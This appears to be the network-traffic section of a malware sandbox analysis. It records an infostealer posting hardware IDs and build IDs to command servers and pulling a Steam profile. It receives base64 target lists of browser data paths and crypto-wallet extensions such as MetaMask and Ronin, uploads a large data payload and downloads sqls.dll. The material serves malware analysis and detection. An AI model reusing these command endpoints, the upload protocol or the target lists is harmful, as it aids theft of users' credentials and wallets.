                                                                              2024-05-26 08:23:07 UTC | 289 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1230
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:23:07 UTC | 1230 | OUT
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:23:07 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:23:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0o1mvoeq36c1sfia6qsrk21ter; expires=Thu, 19-Sep-2024 02:09:46 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I14rp81LFQrObk%2BsBLIIoaO4G%2B%2B63uKzAW9BXDeFbHwx9Q55otJBM1QvPfon6ne8Bux2I7vLjU87l5RDaalTlI0fc5WY2hL5qyMazRS%2FDYEjmmUhwbe7WT%2B6qoZLQrNdaOzkfboxBOGN7vc%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5c7f4bc90f59-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:23:07 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                              Data Ascii: fok 8.46.123.175
                                                                              2024-05-26 08:23:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              7 | 192.168.2.4 | 52660 | 104.102.42.29 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:08 UTC | 119 | OUT | GET /profiles/76561199689717899 HTTP/1.1
                                                                              Host: steamcommunity.com
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:08 UTC | 1882 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                              Cache-Control: no-cache
                                                                              Date: Sun, 26 May 2024 08:23:08 GMT
                                                                              Content-Length: 35682
                                                                              Connection: close
                                                                              Set-Cookie: sessionid=f21f9dc66fb72e205846487e; Path=/; Secure; SameSite=None
                                                                              Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
                                                                              2024-05-26 08:23:08 UTC | 14502 | IN
                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                              2024-05-26 08:23:08 UTC | 16384 | IN
                                                                              Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
                                                                              2024-05-26 08:23:08 UTC | 3768 | IN
                                                                              Data Ascii: <div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199689717899/badges">
                                                                              2024-05-26 08:23:08 UTC | 1028 | IN
                                                                              Data Ascii: this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              8 | 192.168.2.4 | 52661 | 188.114.96.3 | 443 | 3192 | C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:08 UTC | 291 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 582478
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:23:09 UTC | 15331 | OUT
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:23:12 UTC | 804 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:23:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=papo0m3jaro2vji3c45901mahb; expires=Thu, 19-Sep-2024 02:09:51 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=buqwfg70GokUwk84ynHLRHmF2gh5QFEWzoty4BUo0DMxuhT7vwSu0WhgfmioCfLzm40fwZQDOttDjtAiiLNmnKcLw9qVNglTsUte5YERyu12Ycb3apmPzwkvjk124uWGsPwDFIdh53Sa3H4%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5c89aadd41c3-EWR
                                                                              alt-svc: h3=":443"; ma=86400


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              9 | 192.168.2.4 | 52662 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:09 UTC | 186 | OUT | GET / HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:10 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              10 | 192.168.2.4 | 52663 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:11 UTC | 278 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCB
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 279
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:11 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 38 33 46 43 42 33 35 46 36 30 33 38 31 30 32 38 39 34 34 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d
                                                                              Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="hwid"2683FCB35F603810289448-a33c7340-61ca-11ee-8c18-806e6f6e6963------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------
                                                                              2024-05-26 08:23:11 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:11 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 3a1|1|1|1|d2ebfa196795aa7682e7f079a5f59ae7|1|1|1|1|1|50000|10


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              11 | 192.168.2.4 | 52664 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:12 UTC | 278 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:12 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IIEBGIDAAFHIJJJJEGCGCont
                                                                              2024-05-26 08:23:13 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:13 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                              Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              12 | 192.168.2.4 | 52665 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:14 UTC | 278 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:14 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HCBAKJEHDBGHIEBGCGDGCont
                                                                              2024-05-26 08:23:15 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:15 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                              Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              13 | 192.168.2.4 | 52668 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:16 UTC | 278 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 332
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:16 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CGHDAKKJJJKJKECBGCGDCont
                                                                              2024-05-26 08:23:17 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:17 UTC | 119 | IN | Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              14 | 192.168.2.4 | 52669 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:18 UTC | 279 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 5645
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:18 UTC5645OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KEBFHIJECFIDGDGCGHCGCont
                                                                              2024-05-26 08:23:19 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:19 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              15 | 192.168.2.4 | 52671 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:19 UTC | 194 | OUT | GET /sqls.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:19 UTC | 248 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:19 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 2459136
                                                                              Last-Modified: Fri, 24 May 2024 10:18:21 GMT
                                                                              Connection: close
                                                                              ETag: "6650696d-258600"
                                                                              Accept-Ranges: bytes


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              16 | 192.168.2.4 | 52674 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:22 UTC | 279 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----EBGCFBGCBFHJECBGDAKK
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 4677
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:22 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 46 42 47 43 42 46 48 4a 45 43 42 47 44 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 46 42 47 43 42 46 48 4a 45 43 42 47 44 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 46 42 47 43 42 46 48 4a 45 43 42 47 44 41 4b 4b 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------EBGCFBGCBFHJECBGDAKKContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------EBGCFBGCBFHJECBGDAKKContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------EBGCFBGCBFHJECBGDAKKCont
                                                                              2024-05-26 08:23:23 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:23 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
